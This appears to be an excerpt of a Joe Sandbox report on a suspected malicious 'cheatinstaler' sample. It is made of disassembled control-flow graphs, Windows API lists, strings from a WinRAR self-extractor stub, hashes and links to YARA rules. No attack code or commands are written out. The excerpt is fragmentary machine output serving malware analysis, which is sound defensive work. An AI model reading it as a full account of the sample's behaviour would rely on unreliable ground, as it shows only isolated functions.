SetEnvironmentVariableW GetLocalTime call 7ff754553e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff75456b014 call 7ff7545598ac call 7ff7545667b4 * 2 DialogBoxParamW call 7ff7545668a8 * 2 1496->1510 1511 7ff754570b60-7ff754570b85 call 7ff754541fa0 call 7ff754573640 1496->1511 1527 7ff7545709ec-7ff7545709f3 1497->1527 1528 7ff7545709b9-7ff7545709cc 1497->1528 1499->1493 1500->1483 1500->1499 1513 7ff754570df5-7ff754570e2f call 7ff754571900 1502->1513 1572 7ff754570cec-7ff754570cf3 1510->1572 1573 7ff754570ce6 Sleep 1510->1573 1511->1510 1520 7ff754570e34-7ff754570e81 1513->1520 1520->1513 1532 7ff754570adb-7ff754570b12 call 7ff75457797c call 7ff75454129c call 7ff75456fd0c 1527->1532 1533 7ff7545709f9-7ff754570a13 OpenFileMappingW 1527->1533 1530 7ff7545709ce-7ff7545709e1 1528->1530 1531 7ff7545709e7 call 7ff75457220c 1528->1531 1530->1502 1530->1531 1531->1527 1532->1496 1555 7ff754570b14-7ff754570b27 1532->1555 1534 7ff754570a19-7ff754570a39 MapViewOfFile 1533->1534 1535 7ff754570ad0-7ff754570ad9 CloseHandle 1533->1535 1534->1535 1541 7ff754570a3f-7ff754570a6f UnmapViewOfFile MapViewOfFile 1534->1541 1535->1496 1541->1535 1544 7ff754570a71-7ff754570aca call 7ff75456a190 call 7ff75456fd0c call 7ff75455b9b4 call 7ff75455bb00 call 7ff75455bb70 UnmapViewOfFile 1541->1544 1544->1535 1558 7ff754570b29-7ff754570b3c 1555->1558 1559 7ff754570b42 call 7ff75457220c 1555->1559 1558->1559 1562 7ff754570dd7-7ff754570ddc call 7ff754577904 1558->1562 1559->1496 1562->1483 1575 7ff754570cfa-7ff754570d1d call 7ff75455b8e0 DeleteObject 1572->1575 1576 7ff754570cf5 call 7ff754569f4c 1572->1576 1573->1572 1581 7ff754570d25-7ff754570d2c 1575->1581 1582 7ff754570d1f DeleteObject 1575->1582 1576->1575 1583 7ff754570d2e-7ff754570d35 1581->1583 1584 7ff754570d48-7ff754570d59 1581->1584 1582->1581 1583->1584 1585 7ff754570d37-7ff754570d43 call 7ff75454ba0c 1583->1585 1586 7ff754570d6d-7ff754570d7a 1584->1586 1587 7ff754570d5b-7ff754570d67 call 7ff75456fe24 CloseHandle 1584->1587 1585->1584 1589 7ff754570d7c-7ff754570d89 1586->1589 1590 7ff754570d9f-7ff754570da4 call 7ff7545694e4 1586->1590 1587->1586 1593 7ff754570d8b-7ff754570d93 1589->1593 1594 7ff754570d99-7ff754570d9b 1589->1594 1598 7ff754570da9-7ff754570dd6 call 7ff754572320 1590->1598 1593->1590 1596 7ff754570d95-7ff754570d97 1593->1596 1594->1590 1597 7ff754570d9d 1594->1597 1596->1590 1597->1590
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                  • API String ID: 1048086575-3710569615
                                                                                  • Opcode ID: a2d1f56a0ea0f115fb5c545e7d969dd7b349b6d85002bdedd461fc6b968f04a4
                                                                                  • Instruction ID: d4d84aca52a22be71ef4025fbaf0d496db53db59a88c6c8fe62bbbad14d3cba4
                                                                                  • Opcode Fuzzy Hash: a2d1f56a0ea0f115fb5c545e7d969dd7b349b6d85002bdedd461fc6b968f04a4
                                                                                  • Instruction Fuzzy Hash: 6B127761A1878295FB10AF26E8E52BDF3A1FF84794F984131DA5D47AA5DF3CE244C320
                                                                                  Function 00007FF75455A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                  • String ID: $%s:$CAPTION
                                                                                  • API String ID: 1936833115-404845831
                                                                                  • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                  • Instruction ID: 1a202c29a249c8db9990b78725d0014a3de2dd91470826dfddd2d514551b4150
                                                                                  • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                  • Instruction Fuzzy Hash: DB91F732B1864186E714EF2AE8A06BDE7A1FB84784F885535EE4D57B58DF3CE805CB10
                                                                                  Function 00007FF754568624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                  • String ID: PNG
                                                                                  • API String ID: 541704414-364855578
                                                                                  • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                  • Instruction ID: c632dfba5da006371187eca26800bb5ef0f8519ceb321a1d1b9c6a04ff75e671
                                                                                  • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                  • Instruction Fuzzy Hash: EE410A25A1AA4292FE54AF5794A4379B3A0BF88BD0F9C4435DE0D473A4EF7DE4488720
                                                                                  Function 00007FF75454F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: __tmp_reference_source_
                                                                                  • API String ID: 3668304517-685763994
                                                                                  • Opcode ID: c95adfe0dddff1d952a1755b735b07641f6b8a796b48e1e69593c56425167c21
                                                                                  • Instruction ID: e836918cd87a775964bd514a8cd19a51b0c40aeff2939b913321ec73d052ed21
                                                                                  • Opcode Fuzzy Hash: c95adfe0dddff1d952a1755b735b07641f6b8a796b48e1e69593c56425167c21
                                                                                  • Instruction Fuzzy Hash: A7E2BA62A086C252EA64EF26E1E03FEE761FB81784F984131EB9D076A5DF3CE455C710
                                                                                  Function 00007FF754544840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: CMT
                                                                                  • API String ID: 3668304517-2756464174
                                                                                  • Opcode ID: d27e10a47ab199182401eb8f629d16e0782fa570b7d722cbddcdfe00517a4b91
                                                                                  • Instruction ID: 0be1a67a0cf8a2e59348ab034db9d60469057a45eb68ca64454867185dc0acca
                                                                                  • Opcode Fuzzy Hash: d27e10a47ab199182401eb8f629d16e0782fa570b7d722cbddcdfe00517a4b91
                                                                                  • Instruction Fuzzy Hash: 66E2EE22F0868696EB18EF66D4A03FDA7A1FB45384F980035DB5E4B696DF7CE154C320
                                                                                  Function 00007FF7545540BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3714 7ff7545540bc-7ff7545540f3 3715 7ff7545540f9-7ff754554101 3714->3715 3716 7ff7545541d2-7ff7545541df FindNextFileW 3714->3716 3717 7ff754554103 3715->3717 3718 7ff754554106-7ff754554118 FindFirstFileW 3715->3718 3719 7ff7545541f3-7ff7545541f6 3716->3719 3720 7ff7545541e1-7ff7545541f1 GetLastError 3716->3720 3717->3718 3718->3719 3723 7ff75455411e-7ff754554146 call 7ff754556a0c 3718->3723 3721 7ff7545541f8-7ff754554200 3719->3721 3722 7ff754554211-7ff754554253 call 7ff75457797c call 7ff75454129c call 7ff754558090 3719->3722 3724 7ff7545541ca-7ff7545541cd 3720->3724 3726 7ff754554205-7ff75455420c call 7ff7545420b0 3721->3726 3727 7ff754554202 3721->3727 3750 7ff75455428c-7ff7545542e6 call 7ff75455f168 * 3 3722->3750 3751 7ff754554255-7ff75455426c 3722->3751 3734 7ff754554167-7ff754554170 3723->3734 3735 7ff754554148-7ff754554164 FindFirstFileW 3723->3735 3729 7ff7545542eb-7ff75455430e call 7ff754572320 3724->3729 3726->3722 3727->3726 3738 7ff7545541a9-7ff7545541ad 3734->3738 3739 7ff754554172-7ff754554189 3734->3739 3735->3734 3738->3719 3743 7ff7545541af-7ff7545541be GetLastError 3738->3743 3741 7ff75455418b-7ff75455419e 3739->3741 3742 7ff7545541a4 call 7ff75457220c 3739->3742 3741->3742 3745 7ff754554315-7ff75455431b call 7ff754577904 3741->3745 3742->3738 3747 7ff7545541c8 3743->3747 3748 7ff7545541c0-7ff7545541c6 3743->3748 3747->3724 3748->3724 3748->3747 3750->3729 3754 7ff75455426e-7ff754554281 3751->3754 3755 7ff754554287 call 7ff75457220c 3751->3755 3754->3755 3758 7ff75455430f-7ff754554314 call 7ff754577904 3754->3758 3755->3750 3758->3745
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                  • String ID:
                                                                                  • API String ID: 474548282-0
                                                                                  • Opcode ID: e946e08dc8eba9ecab1b1533132c2bb6995f9a4699fd30eb303f74d9a567b386
                                                                                  • Instruction ID: b3c3b85b7b07d0a8fea7461175f13c70dba3f112a07c7c23dc0ce8632436cff4
                                                                                  • Opcode Fuzzy Hash: e946e08dc8eba9ecab1b1533132c2bb6995f9a4699fd30eb303f74d9a567b386
                                                                                  • Instruction Fuzzy Hash: 0761D662A0864281EA11EF26E8D02BDA361FB857B4F945331FABD07AD9DF3CD544C710
                                                                                  Function 00007FF754545E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3825 7ff754545e24-7ff754546129 call 7ff75455833c call 7ff7545585f0 3831 7ff75454612e-7ff754546132 3825->3831 3832 7ff754546141-7ff754546171 call 7ff7545583d8 call 7ff754558570 call 7ff754558528 3831->3832 3833 7ff754546134-7ff75454613c call 7ff754546fcc 3831->3833 3851 7ff754546177-7ff754546179 3832->3851 3852 7ff754546973-7ff754546976 call 7ff75454466c 3832->3852 3838 7ff75454697b 3833->3838 3840 7ff75454697e-7ff754546985 3838->3840 3842 7ff754546987-7ff754546998 3840->3842 3843 7ff7545469b4-7ff7545469e3 call 7ff754572320 3840->3843 3845 7ff75454699a-7ff7545469ad 3842->3845 3846 7ff7545469af call 7ff75457220c 3842->3846 3845->3846 3849 7ff7545469e4-7ff7545469e9 call 7ff754577904 3845->3849 3846->3843 3860 7ff7545469ea-7ff7545469ef call 7ff754577904 3849->3860 3851->3852 3856 7ff75454617f-7ff754546189 3851->3856 3852->3838 3856->3852 3858 7ff75454618f-7ff754546192 3856->3858 3858->3852 3859 7ff754546198-7ff7545461aa call 7ff7545585f0 3858->3859 3859->3833 3865 7ff7545461ac-7ff7545461fd call 7ff7545584f8 call 7ff754558528 * 2 3859->3865 3866 7ff7545469f0-7ff7545469f7 call 7ff754577904 3860->3866 3875 7ff75454623f-7ff754546249 3865->3875 3876 7ff7545461ff-7ff754546222 call 7ff75454466c call 7ff75454ba0c 3865->3876 3877 7ff75454624b-7ff754546260 call 7ff754558528 3875->3877 3878 7ff754546266-7ff754546270 3875->3878 3876->3875 3893 7ff754546224-7ff75454622e call 7ff75454433c 3876->3893 3877->3852 3877->3878 3881 7ff75454627e-7ff754546296 call 7ff75454334c 3878->3881 3882 7ff754546272-7ff75454627b call 7ff754558528 3878->3882 3891 7ff754546298-7ff75454629b 3881->3891 3892 7ff7545462b3 3881->3892 3882->3881 3891->3892 3895 7ff75454629d-7ff7545462b1 3891->3895 3896 7ff7545462b6-7ff7545462c8 3892->3896 3893->3875 3895->3892 3895->3896 3897 7ff7545468b7-7ff754546929 call 7ff754554d04 call 7ff754558528 3896->3897 3898 7ff7545462ce-7ff7545462d1 3896->3898 3917 7ff75454692b-7ff754546934 call 7ff754558528 3897->3917 3918 7ff754546936 3897->3918 3899 7ff7545462d7-7ff7545462da 3898->3899 3900 7ff754546481-7ff7545464f4 call 7ff754554c74 call 7ff754558528 * 2 3898->3900 3899->3900 3902 7ff7545462e0-7ff7545462e3 3899->3902 3932 7ff754546507-7ff754546533 call 7ff754558528 3900->3932 3933 7ff7545464f6-7ff754546500 3900->3933 3905 7ff75454632e-7ff754546353 call 7ff754558528 3902->3905 3906 7ff7545462e5-7ff7545462e8 3902->3906 3921 7ff75454639e-7ff7545463c5 call 7ff754558528 call 7ff754558384 3905->3921 3922 7ff754546355-7ff75454638f call 7ff754544228 call 7ff754543c84 call 7ff75454701c call 7ff754541fa0 3905->3922 3909 7ff7545462ee-7ff754546329 call 7ff754558528 3906->3909 3910 7ff75454696d-7ff754546971 3906->3910 3909->3910 3910->3840 3924 7ff754546939-7ff754546946 3917->3924 3918->3924 3944 7ff7545463c7-7ff754546400 call 7ff754544228 call 7ff754543c84 call 7ff75454701c call 7ff754541fa0 3921->3944 3945 7ff754546402-7ff75454641f call 7ff754558444 3921->3945 3969 7ff754546390-7ff754546399 call 7ff754541fa0 3922->3969 3929 7ff754546948-7ff75454694a 3924->3929 3930 7ff75454694c 3924->3930 3929->3930 3931 7ff75454694f-7ff754546959 3929->3931 3930->3931 3931->3910 3936 7ff75454695b-7ff754546968 call 7ff754544840 3931->3936 3946 7ff754546549-7ff754546557 3932->3946 3947 7ff754546535-7ff754546544 call 7ff7545583d8 call 7ff75455f134 3932->3947 3933->3932 3936->3910 3944->3969 3965 7ff754546421-7ff75454646f call 7ff754558444 * 2 call 7ff75455c800 call 7ff754574a70 3945->3965 3966 7ff754546475-7ff75454647c 3945->3966 3950 7ff754546559-7ff75454656c call 7ff7545583d8 3946->3950 3951 7ff754546572-7ff754546595 call 7ff754558528 3946->3951 3947->3946 3950->3951 3970 7ff754546597-7ff75454659e 3951->3970 3971 7ff7545465a0-7ff7545465b0 3951->3971 3965->3966 3966->3910 3969->3921 3975 7ff7545465b3-7ff7545465eb call 7ff754558528 * 2 3970->3975 3971->3975 3989 7ff7545465ed-7ff7545465f4 3975->3989 3990 7ff7545465f6-7ff7545465fa 3975->3990 3992 7ff754546603-7ff754546632 3989->3992 3990->3992 3994 7ff7545465fc 3990->3994 3995 7ff75454663f 3992->3995 3996 7ff754546634-7ff754546638 3992->3996 3994->3992 3998 7ff754546641-7ff754546656 3995->3998 3996->3995 3997 7ff75454663a-7ff75454663d 3996->3997 3997->3998 3999 7ff7545466ca 3998->3999 4000 7ff754546658-7ff75454665b 3998->4000 4002 7ff7545466d2-7ff754546731 call 7ff754543d00 call 7ff754558444 call 7ff754560d54 3999->4002 4000->3999 4001 7ff75454665d-7ff754546683 4000->4001 4001->4002 4003 7ff754546685-7ff7545466a9 4001->4003 4013 7ff754546745-7ff754546749 4002->4013 4014 7ff754546733-7ff754546740 call 7ff754544840 4002->4014 4006 7ff7545466ab 4003->4006 4007 7ff7545466b2-7ff7545466bf 4003->4007 4006->4007 4007->4002 4009 7ff7545466c1-7ff7545466c8 4007->4009 4009->4002 4016 7ff75454675b-7ff754546772 call 7ff75457797c 4013->4016 4017 7ff75454674b-7ff754546756 call 7ff75454473c 4013->4017 4014->4013 4023 7ff754546777-7ff75454677e 4016->4023 4024 7ff754546774 4016->4024 4022 7ff754546859-7ff754546860 4017->4022 4027 7ff754546862-7ff754546872 call 7ff75454433c 4022->4027 4028 7ff754546873-7ff75454687b 4022->4028 4025 7ff754546780-7ff754546783 4023->4025 4026 7ff7545467a3-7ff7545467ba call 7ff75457797c 4023->4026 4024->4023 4029 7ff75454679c 4025->4029 4030 7ff754546785 4025->4030 4041 7ff7545467bc 4026->4041 4042 7ff7545467bf-7ff7545467c6 4026->4042 4027->4028 4028->3910 4033 7ff754546881-7ff754546892 4028->4033 4029->4026 4036 7ff754546788-7ff754546791 4030->4036 4034 7ff7545468ad-7ff7545468b2 call 7ff75457220c 4033->4034 4035 7ff754546894-7ff7545468a7 4033->4035 4034->3910 4035->3866 4035->4034 4036->4026 4040 7ff754546793-7ff75454679a 4036->4040 4040->4029 4040->4036 4041->4042 4042->4022 4044 7ff7545467cc-7ff7545467cf 4042->4044 4045 7ff7545467e8-7ff7545467f0 4044->4045 4046 7ff7545467d1 4044->4046 4045->4022 4048 7ff7545467f2-7ff754546826 call 7ff754558360 call 7ff754558598 call 7ff754558528 4045->4048 4047 7ff7545467d4-7ff7545467dd 4046->4047 4047->4022 4050 7ff7545467df-7ff7545467e6 4047->4050 4048->4022 4056 7ff754546828-7ff754546839 4048->4056 4050->4045 4050->4047 4057 7ff75454683b-7ff75454684e 4056->4057 4058 7ff754546854 call 7ff75457220c 4056->4058 4057->3860 4057->4058 4058->4022
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CMT
                                                                                  • API String ID: 0-2756464174
                                                                                  • Opcode ID: 589854a86694341a55c69b07c8121abed16d2d53b78a965ac968b8bdafdd2d04
                                                                                  • Instruction ID: 664aad1a093bca371b54e9ab74cf0dd1b7c99146fc0b6dbb31f6661748e5e420
                                                                                  • Opcode Fuzzy Hash: 589854a86694341a55c69b07c8121abed16d2d53b78a965ac968b8bdafdd2d04
                                                                                  • Instruction Fuzzy Hash: FD42BE22F0868296EB18EF76C1A13FDB7A0AB11744F980136DB5E5B696DF3CE558C310
                                                                                  Function 00007FF75455DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 7ff75455dfd0-7ff75455e024 call 7ff754572450 GetModuleHandleW 3 7ff75455e07b-7ff75455e3a5 0->3 4 7ff75455e026-7ff75455e039 GetProcAddress 0->4 7 7ff75455e3ab-7ff75455e3b4 call 7ff75457b788 3->7 8 7ff75455e503-7ff75455e521 call 7ff754556454 call 7ff754557df4 3->8 5 7ff75455e03b-7ff75455e04a 4->5 6 7ff75455e053-7ff75455e066 GetProcAddress 4->6 5->6 6->3 10 7ff75455e068-7ff75455e078 6->10 7->8 14 7ff75455e3ba-7ff75455e3fd call 7ff754556454 CreateFileW 7->14 20 7ff75455e525-7ff75455e52f call 7ff7545551a4 8->20 10->3 21 7ff75455e403-7ff75455e416 SetFilePointer 14->21 22 7ff75455e4f0-7ff75455e4fe CloseHandle call 7ff754541fa0 14->22 28 7ff75455e564-7ff75455e5ac call 7ff75457797c call 7ff75454129c call 7ff754558090 call 7ff754541fa0 call 7ff7545532bc 20->28 29 7ff75455e531-7ff75455e53c call 7ff75455dd88 20->29 21->22 24 7ff75455e41c-7ff75455e43e ReadFile 21->24 22->8 24->22 27 7ff75455e444-7ff75455e452 24->27 32 7ff75455e458-7ff75455e4ac call 7ff75457797c call 7ff75454129c 27->32 33 7ff75455e800-7ff75455e807 call 7ff754572624 27->33 71 7ff75455e5b1-7ff75455e5b4 28->71 29->28 38 7ff75455e53e-7ff75455e562 CompareStringW 29->38 50 7ff75455e4c3-7ff75455e4d9 call 7ff75455d0a0 32->50 38->28 42 7ff75455e5bd-7ff75455e5c6 38->42 42->20 45 7ff75455e5cc 42->45 48 7ff75455e5d1-7ff75455e5d4 45->48 51 7ff75455e5d6-7ff75455e5d9 48->51 52 7ff75455e63f-7ff75455e642 48->52 60 7ff75455e4db-7ff75455e4eb call 7ff754541fa0 * 2 50->60 61 7ff75455e4ae-7ff75455e4be call 7ff75455dd88 50->61 58 7ff75455e5dd-7ff75455e62d call 7ff75457797c call 7ff75454129c call 7ff754558090 call 7ff754541fa0 call 7ff7545532bc 51->58 56 7ff75455e648-7ff75455e65b call 7ff754557eb0 call 7ff7545551a4 52->56 57 7ff75455e7c2-7ff75455e7ff call 7ff754541fa0 * 2 call 7ff754572320 52->57 82 7ff75455e706-7ff75455e753 call 7ff75455da98 AllocConsole 56->82 83 7ff75455e661-7ff75455e701 call 7ff75455dd88 * 2 call 7ff75455aae0 call 7ff75455da98 call 7ff75455aae0 call 7ff75455dc2c call 7ff7545687ac call 7ff7545419e0 56->83 108 7ff75455e63c 58->108 109 7ff75455e62f-7ff75455e638 58->109 60->22 61->50 76 7ff75455e5ce 71->76 77 7ff75455e5b6 71->77 76->48 77->42 94 7ff75455e755-7ff75455e7aa GetCurrentProcessId AttachConsole call 7ff75455e868 call 7ff75455e858 GetStdHandle WriteConsoleW Sleep FreeConsole 82->94 95 7ff75455e7b0 82->95 97 7ff75455e7b4-7ff75455e7bb call 7ff7545419e0 ExitProcess 83->97 94->95 95->97 108->52 109->58 111 7ff75455e63a 109->111 111->52
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
